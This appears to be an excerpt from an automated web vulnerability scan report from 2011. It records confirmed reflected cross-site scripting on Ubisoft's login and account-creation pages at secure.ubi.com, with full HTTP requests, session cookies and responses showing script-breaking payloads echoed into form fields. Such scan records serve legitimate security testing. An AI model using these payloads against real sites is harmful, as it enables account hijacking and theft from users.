<title>Ubisoft - Create Your Account</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="UserInteraction.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW+Om/nytQxM0XnQ==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_signup.gif" border="0" /></td>
</tr>
<tr>
<td colspan="2" height="20"/>
</tr>
<tr>
<td/>
<td class="mainmessage">Please provide the following information to create your ubi.com account.</td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td class="fieldnameerror">*&nbsp;User Name</td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="15" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your User Name','Please choose a ubi.com user name that is in good taste and will be easy for you to remember. It must be a unique name, not already in use by other users.<br/><br/> Please note that your user name must meet the following criteria:<br/>· User names must be unique<br/>· User names must start with a letter.<br/>· User names may contain letters, digits, underscores (_), dots (.) and dashes (-).<br/>· The length must be between 3 and 15 characters.<br/>· Words considered vulgar or offensive are not allowed as any part of the user name.<br/>· It cannot start or end with letter combinations reserved by the company (i.e. ubi_ or _ubi).');glossaryToolTip('Choosing Your User Name', 636);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Password</td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="3" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your Password','Please be original in choosing a password. For security reasons, please do not use anything that might easily connect your password to you.<br/><br/> Passwords must be at least 6 characters long and a maximum of 16 characters long. <br/> Passwords are case sensitive. <br/> The username cannot appear in the password.<br/> Passwords must contain at least one letter.');glossaryToolTip('Choosing Your Password', 366);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Confirm Password</td>
</tr>
<tr>
<td/>
<td><input id="confirmpassword" name="confirmpassword" type="password" maxlength="16" value="3" class="inputcreateusererror"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Email</td>
</tr>
<tr>
<td/>
<td><input id="email" name="email" type="text" maxlength="150" value="'"--></style></script><script>netsparker(0x00055E)</script>" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Please make sure to enter a correct email address as it is the only way for us to reach you.','');glossaryToolTip('Please make sure to enter a correct email address as it is the only way for us to reach you.', 0);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td class="fieldnameerror">*&nbsp;Date of Birth</td>
</tr>
<tr>
<td/>
<td><select id="birthdate_m" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="m1">Jan</option><option value="m2">Feb</option><option value="m3">Mar</option><option value="m4">Apr</option><option value="m5">May</option><option value="m6">Jun</option><option value="m7">Jul</option><option value="m8">Aug</option><option value="m9">Sep</option><option value="m10">Oct</option><option value="m11">Nov</option><option value="m12">Dec</option></select><select id="birthdate_d" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="d1">1</option><option value="d2">2</option><option value="d3">3</option><option value="d4">4</option><option value="d5">5</option><option value="d6">6</option><option value="d7">7</option><option value="d8">8</option><option value="d9">9</option><option value="d10">10</option><option value="d11">11</option><option value="d12">12</option><option value="d13">13</option><option value="d14">14</option><option value="d15">15</option><option value="d16">16</option><option value="d17">17</option><option value="d18">18</option><option value="d19">19</option><option value="d20">20</option><option value="d21">21</option><option value="d22">22</option><option value="d23">23</option><option value="d24">24</option><option value="d25">25</option><option value="d26">26</option><option value="d27">27</option><option value="d28">28</option><option value="d29">29</option><option value="d30">30</option><option value="d31">31</option></select><select id="birthdate_y" name="birthdate" class="inputcreateuserdateerror"><option>------</option><option value="y2011">2011</option><option value="y2010">2010</option><option value="y2009">2009</option><option value="y2008">2008</option><option value="y2007">2007</option><option value="y2006">2006</option><option value="y2005">2005</option><option value="y2004">2004</option><option value="y2003">2003</option><option value="y2002">2002</option><option value="y2001">2001</option><option value="y2000">2000</option><option value="y1999">1999</option><option value="y1998">1998</option><option value="y1997">1997</option><option value="y1996">1996</option><option value="y1995">1995</option><option value="y1994">1994</option><option value="y1993">1993</option><option value="y1992">1992</option><option value="y1991">1991</option><option value="y1990">1990</option><option value="y1989">1989</option><option value="y1988">1988</option><option value="y1987">1987</option><option value="y1986">1986</option><option value="y1985">1985</option><option value="y1984">1984</option><option value="y1983">1983</option><option value="y1982">1982</option><option value="y1981">1981</option><option value="y1980">1980</option><option value="y1979">1979</option><option value="y1978">1978</option><option value="y1977">1977</option><option value="y1976">1976</option><option value="y1975">1975</option><option value="y1974">1974</option><option value="y1973">1973</option><option value="y1972">1972</option><option value="y1971">1971</option><option value="y1970">1970</option><option value="y1969">1969</option><option value="y1968">1968</option><option value="y1967">1967</option><option value="y1966">1966</option><option value="y1965">1965</option><option value="y1964">1964</option><option value="y1963">1963</option><option value="y1962">1962</option><option value="y1961">1961</option><option value="y1960">1960</option><option value="y1959">1959</option><option value="y1958">1958</option><option value="y1957">1957</option><option value="y1956">1956</option><option value="y1955">1955</option><option value=&..
- /login/Login.aspx

/login/Login.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==
_buttonClicked POST submit
login POST 3
m_ImageButtonSubmit POST submit
password POST '"--></style></script><script>alert(0x000570)</script>
RememberPassword POST 1

Request

POST /login/Login.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/Login.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 235
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg%3d%3d&_buttonClicked=submit&login=3&m_ImageButtonSubmit=submit&password='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x000570)%3c%2fscript%3e&RememberPassword=1

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:29:39 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13560


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Log In</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="Login.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz6SkTaBkfFzxohTBeZCkkIG8i63Mg==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">


<tr>
<td>&nbsp;</td>
<td><b class="errormessage">The user name/password combination you entered is not correct. Double check the user name and password, then try again.</b></td>
</tr>
<tr>
<td colspan="2" height="10" ></td>
</tr>




<tr>
<td/>
<td><font class="fieldname">User Name or Email</font></td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="150" value="3" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td><font class="fieldname">Password</font></td>
</tr>
<tr>
<td/>
<td><input id="password" name="password" type="password" maxlength="16" value="'"--></style></script><script>netsparker(0x000570)</script>" class="inputlogin"></td>
</tr>
<tr>
<td/>
<td><a class="link" tabindex=-1 href="/login/ForgotPassword.aspx">Forgot your password?</a></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>




<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td><table border="0" cellpadding="0" cellspacing="0"> <tr> <td rowspan="2"><input type="checkbox" name="RememberPassword" value="1"></td> <td rowspan="2"><img src="/login/Skins/images/b.gif" width="5" height="0" border="0" alt=""></td> <td class="content">Remember me on this computer</td> </tr> <tr> <td valign="top"> <a class="link" tabIndex=-1 href='/login/Help.aspx'>What does this mean?</a> </td> </tr></table></td>
</tr>
<tr>
<td/>
<td></td>
</tr>
<tr>
<td/>
<td height="10" />
</tr>


<input type="hidden" name="_buttonClicked" id="_buttonClicked" value="submit">

<tr>
<td/>
<td height="30" />
</tr>
<tr>
<td/>
<td><input type="image" name="m_ImageButtonSubmit" id="m_ImageButtonSubmit" onclick="document.forms['UIMForm']._buttonClicked.value='submit';return true;" OnMouseOver="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit_over.gif')" OnMouseOut="UBI_SetImage('m_ImageButtonSubmit','/login/Skins/default/en-US/btn_Submit.gif')" src="/login/Skins/default/en-US/btn_Submit.gif" alt="" border="0" />
<a OnMouseOver="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel_over.gif')" OnMouseOut="UBI_SetImage('m_ImageCancel','/login/Skins/default/en-US/btn_Cancel.gif')" href="http://www.ubi.com/US/"><img id="m_ImageCancel" src="/login/Skins/default/en-US/btn_Cancel.gif" alt="" border="0" /></a></td>
</tr>




</table>

</div>
<div style="clear:both;"></div>

<table>
<tr>
<td>

<!--FOOTER en-US-->
<div id="footer">

<div style="float:right; margin-top:5px;">
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy"><img src="/login/Skins/images/ectppsubisoft.gif" alt="" border="0" /></a>
</div>

<p>
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=PrivacyPolicy">Privacy Policy</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=TermsOfUse">Terms of Use</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=Legal">Legal Info</a> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=ContactUs">Contact Us</a> |
<a href="http://www.ubisoftgroup.com/Jobs/Default.aspx?country=US">Employment</a> |
<a href="http://www.ubisoftgroup.com/MediaCenter/Default.aspx?lang=en-US">Presse</A> |
<a href="http://www.ubi.com/US/Info/Info.aspx?tagname=About">About Ubisoft</A>
</p>
<p>© 2008 Ubisoft Entertainment. All Rights Reserved.<br/>
Ubisoft, Ubi.com and the Ubisoft logo are trademarks of Ubisoft Entertainment in the U.S. and/or other countries.</p>
</div>
<!--END FOOTER en-US-->
<tr><td>
<!-- Ubi stat code start -->
<script type='text/javascript'>
<!--
ubi_tag = 'WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN';
ubi_system = 'WEB';
ubi_umon_domain = 'uts.ubi.com';
ubi_umon_protocol = 'https';
-->
</script>
<script type='text/javascript' src='https://uts.ubi.com/scripts/umon2.1.js'>
</script>
<noscript>
<img height=1 width=1 src='https://uts.ubi.com/stats.aspx?system=WEB&tag=WEB.PTL_UBISOFT.NOPRODUCT.en-US.REGISTRATION_SIGNUP_LOGIN&ref=https%3a%2f%2fsecure.ubi.com%2flogin%2fLogin.aspx'>
</noscript>
<!-- Ubi stat code end -->
</td></tr>
</td>
</tr>
</table>


</div>
<div style="clear:both;"></div>

</div>

</tr>
</td>
</table>







<div id="toolTipLayerSizeDetect" style="position:absolute; visibility: hidden; left:0;"></div>
<div id="toolTipLayer" style="position:absolute; visibility: hidden; left:0;"></div>
<script language="JavaScript">
<!--
var ns4 = document.layers;
var ns6 = document.getElementById && !document.all;
var ie4 = document.all;

initToolTips();

function toolTip(msg)
{
var bLocationTop = 0;

var curHeight = 0;

putToolTipContent(msg, true, true);

if(toolTipLayerSizeDetectObject.clientHeight){
curHeight = toolTipLayerSizeDetectObject.clientHeight;
}else{
curHeight = toolTipLayerSizeDetectObject.offsetHeight;
}

if (ns4||ns6){
if (yCoordinate < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
else{
if (event.clientY < curHeight){
putToolTipContent(msg, false, true);
}else{
putToolTipContent(msg, false, false);
}
}
}

function putToolTipContent(msg, bTestDiv, bTop){
var content= '';

if (bTop)
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"><img src="/login/Skins/images/b_arrow_top.gif" width="33" height="13"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}
else
{
content = ' <table width="250" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="5"><img src="/login/Skins/images/b_top_left.gif" width="5" height="13"></td> <td width="240" background="/login/Skins/images/b_top.gif"></td> <td width="5"><img src="/login/Skins/images/b_top_right.gif" width="5" height="13"></td> </tr> <tr> <td background="/login/Skins/images/b_left.gif">&nbsp;</td> <td valign="top" background="/login/Skins/images/b_bg_tile.gif" class="helplayer"> ' + msg + ' </td> <td background="/login/Skins/images/b_right.gif">&nbsp;</td> </tr> <tr> <td><img src="/login/Skins/images/b_bottom_left.gif" width="5" height="13"></td> <td background="/login/Skins/images/b_bottom.gif"><img src="/login/Skins/images/b_arrow_bottom.gif" width="33" height="13"></td> <td><img src="/login/Skins/images/b_bottom_right.gif" width="5" height="13"></td> </tr> </table> ';
}

if(bTestDiv){
if(ns4)
{
toolTipSTYLE_DETECT.document.write(content);
toolTipSTYLE_DETECT.document.close();
}
if(ns6)
{
document.getElementById("toolTipLayerSizeDetect").innerHTML=content;
}
if(ie4)
{
document.all("toolTipLayerSizeDetect").innerHTML=content;
}
}else{
if(ns4)
{
toolTipSTYLE.document.write(content);
toolTipSTYLE.document.close();
toolTipSTYLE.visibility = "visible";
}
if(ns6)
{
document.getElementById("toolTipLayer").innerHTML = content;
toolTipSTYLE.display='block';
}
if(ie4)
{
document.all("toolTipLayer").innerHTML=content;
toolTipSTYLE.display='block';
}
}
- /login/UserInteraction.aspx

/login/UserInteraction.aspx CONFIRMED

Parameters

Parameter Type Value
__VIEWSTATE POST dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW Om/nytQxM0XnQ==
login POST '"--></style></script><script>alert(0x0005A1)</script>
password POST 3
confirmpassword POST 3
email POST netsparker@example.com
birthdate POST ------
country POST us
ubi_promo POST ubi_promo
shareinfo POST shareinfo
_buttonClicked POST submit
m_ImageButtonSubmit.x POST 0
m_ImageButtonSubmit.y POST 0

Request

POST /login/UserInteraction.aspx HTTP/1.1
Referer: https://secure.ubi.com/login/UserInteraction.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.ubi.com
Cookie: ASP.NET_SessionId=mwhoe5jronoube55jd2gaazw; cookie_enabled=true; ASP.NET_SessionId=vfo11q45ehliqg55jytcst55; visitor_id=C9CA41E2-0082-41FF-B6C4-AA2B7A20EE48; utsver=30053; ubisession=1976810880
Content-Length: 358
Accept-Encoding: gzip, deflate

__VIEWSTATE=dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW%2bOm%2fnytQxM0XnQ%3d%3d&login='%22--%3e%3c%2fstyle%3e%3c%2fscript%3e%3cscript%3enetsparker(0x0005A1)%3c%2fscript%3e&password=3&confirmpassword=3&email=netsparker%40example.com&birthdate=------&country=us&ubi_promo=ubi_promo&shareinfo=shareinfo&_buttonClicked=submit&m_ImageButtonSubmit.x=0&m_ImageButtonSubmit.y=0

Response

HTTP/1.1 200 OK
Date: Fri, 22 Apr 2011 16:30:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 39788


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" >
<HTML
lang="en-US"
dir="ltr">
<HEAD>
<title>Ubisoft - Create Your Account</title> <link href="/login/Skins/stylesheet.css" type="text/css" rel="stylesheet"/> <meta name="Content-Language" content="en-US"/><script type="text/javascript" src="/login/scripts/mbox.js"></script><script type="text/javascript" src="/login/scripts/HelpLayer.js"></script><script type="text/javascript" src="/login/scripts/wfu.js"></script><script type="text/javascript" src="/login/scripts/image_swapper.js"></script><script type="text/javascript" src="/login/scripts/displayAndHideQuestions.js"></script><script type="text/javascript" src="/login/scripts/layers.js"></script><link href="/login/Skins/default/stylesheet.css" type="text/css" rel="stylesheet" />
</HEAD>
<body leftmargin="0" topmargin="0" marginwidth="0" marginheight="0">
<form name="UIMForm" method="post" action="UserInteraction.aspx" id="UIMForm">
<input type="hidden" name="__VIEWSTATE" value="dDw5NDczMzQ3NTY7Oz5X3hlRFfeWPOpW+Om/nytQxM0XnQ==" />

<script type="text/javascript" src="https://secure.ubi.com/toolbar/barreubi.php?lang=en-US&disablesignuplogout=1&toolbarwidth=750&loginnexturl=http://www.ubi.com/US/&displaytoolbar=true&encoding=UTF8&secure=true&toolbaralign=center&loginskin=default&disableloginedit=1"></script>

<script type="text/javascript"><!--
function onSearchProductsKeyPress()
{
if (event.keyCode == 13)
goSearchProducts();
}
function goSearchProducts()
{
var pattern = document.getElementById('masterhead_game_search').value;
document.location.href = 'http://www.ubi.com/US/Games/Search.aspx?q=' + escape(pattern);
return true;
}
// -->
</script>

<table width="100%" align="center" cellspacing="0" cellpadding="0">
<tr>
<td align="center">
<div id="wrapper">

<div id="content">

<div id="leftContent">

<table cellpadding="2" cellspacing="4" id="leftInfo">
<tr>
<td colspan="3">
<img src="/login/Skins/default/en-US/RegisterNow.jpg" border="0" />
</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3" class="leftInfoItem"><span style="margin-left:15px;">Why Should I Sign Up?</span></td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>

<tr>
<td style="width:25px;">&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Receive the monthly newsletter.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Play your favorite online games.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Read the latest game news.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Enjoy exclusive store promotions.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Compete for prizes.</td>
</tr>
<tr>
<td>&nbsp;</td>
<td valign="top"><img src="skins/default/images/lnkBullet.gif" alt="" /></td>
<td class="leftInfoItem">Participate in community forums.</td>
</tr>
<tr><td colspan="3">&nbsp;</td></tr>
<tr>
<td colspan="3">
<a href="/login/CreateUser.aspx" onMouseOver="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now_over.gif')" onMouseOut="UBI_SetImage('registernow2','/login/Skins/default/en-US/btn_register_now.gif')">
<img id="registernow2" src="/login/Skins/default/en-US/btn_register_now.gif" border="0">
</a>
</td>
</tr>
</table>


</div>

<div id="rightContent">

<p>
<img class="imgAlign" src="/login/Skins/default/en-US/registerTitle.jpg" border="0">
</p>
<p/>
<p/>
<p/>
<p/>


<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>


<table class="headInfo" width="450" border="0" cellspacing="0" cellpadding="0">

<tr>
<td colspan="2"><img src="/login/Skins/default/en-US/tl_signup.gif" border="0" /></td>
</tr>
<tr>
<td colspan="2" height="20"/>
</tr>
<tr>
<td/>
<td class="mainmessage">Please provide the following information to create your ubi.com account.</td>
</tr>

</table>

<table cellpadding="0" cellspacing="0" id="loginTable">



<tr>
<td/>
<td class="fieldnameerror">*&nbsp;User Name</td>
</tr>
<tr>
<td/>
<td><input id="login" name="login" type="text" maxlength="15" value="'"--></style></script><script>netsparker(0x0005A1)</script>" class="inputcreateusererror">&nbsp;<img src="/login/Skins/images/help_icon.gif" border="0" onMouseOver="addGlossaryWord('Choosing Your User Name','Please choose a ubi.com user name that is in good taste and will be easy for you to remember. It must be a unique name, not already in use by other users.<br/><br/> Please note that your user name must meet the following criteria:<br/>· User names must be unique<br/>· User names must start with a letter.<br/>· User names may contain letters, digits, underscores (_), dots (.) and dashes (-).<br/>· The length must be between 3 and 15 characters.<br/>· Words considered vulgar or offensive are not allowed as any part of the user name.<br/>· It cannot start or end with letter combinations reserved by the company (i.e. ubi_ or _ubi).');glossaryToolTip('Choosing Your User Name', 636);" onMouseOut="hideToolTip();"></td>
</tr>
<tr><td colspan="2"><img src="/login/Skins/images/b.gif" width="1" height="5" border="0" alt=""></td></tr>



<tr>
<td>&nbsp;</td>
<td><b class="errormessage">You have entered an invalid information. Please try again.</b></td>
</tr>
